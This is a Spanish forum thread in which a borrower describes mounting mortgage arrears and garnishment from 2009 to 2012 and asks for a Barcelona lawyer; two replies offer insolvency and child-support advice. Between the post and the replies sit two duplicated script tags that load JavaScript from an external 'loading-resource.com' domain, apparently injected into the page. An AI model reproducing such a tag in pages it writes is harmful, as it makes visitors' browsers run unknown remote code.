Desesperación por un préstamo

La historia empieza en el año 2009.

- Préstamo hipotecario de 138000 euros a devolver en 37 años.

2400 euros de nómina. Pensión alimenticia de 600 euros.

Año 2010. Los ingresos mensuales bajan a 1900 euros, continúa la pensión alimenticia.

Se crea una nueva hipoteca de 15000 euros, para satisfacer temporalmente la parte de las cuotas de la primera que no se alcanza.

Año 2011. Los ingresos mensuales bajan de nuevo a 1700 euros y continúa la pensión alimenticia, se generan de nuevo impagos del préstamo.

El préstamo entra en vía judicial.

Año 2012. Me viene en enero, un embargo en nómina (por otro préstamo).

El salario sigue igual y continúo con la pensión alimenticia. Procuro abonar mensualmente, casi la totalidad de las cuotas mensuales, pero no puedo con las demoras que alcanzan los 8000 euros.

No los tengo y es la vía que me ofrece la caja para poder rescatar el préstamo. Pagar los 8000 euros de una vez o un plan de pagos con una cuota inicial de 4000 euros y 4 de 1000 euros.

Necesito urgente un abogado en Barcelona, que lleve casos como este y que me ayude a salir.

Tengo trabajo fijo y antigüedad del año 1999.

[email protected]

Gracias.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>

2 respuestas

Respuesta

Te recomendaría que en caso de no poder llegar a una acuerdo y evitar refinanciaciones, puedes instar una concurso de persona física, en el que se puede hacer una propuesta de convenio para hacer frente a los pagos y conseguir quitas y esperas a los diferentes créditos, también tiene la ventaja que no te pueden embargar si está admitido el concurso y todo tiene que ir por medio del mismo.

Suerte y un saludo.

Manuel

Soy abogado en Barcelona, si quieres puedes contactarme en:

delhotellerieabogados @ gmail.com

Respuesta

Si buscas un abogado, la categoría más adecuada es: <a>http://www.todoexpertos.com/categorias/humanidades/derecho/</a>

De todas maneras, en el 2010 debiste renegociar la pensión alimenticia, ya que en el 2009 se cifró en 600€ en base a tus ingresos, si en el 2010 ya mermaron, la pensión alimenticia debió bajar en el mismo porcentaje. Debes renegociar la pensión alimenticia en base a tus actuales ingresos a día de hoy. El resto que te asesore mejor un abogado en la categoría Derecho.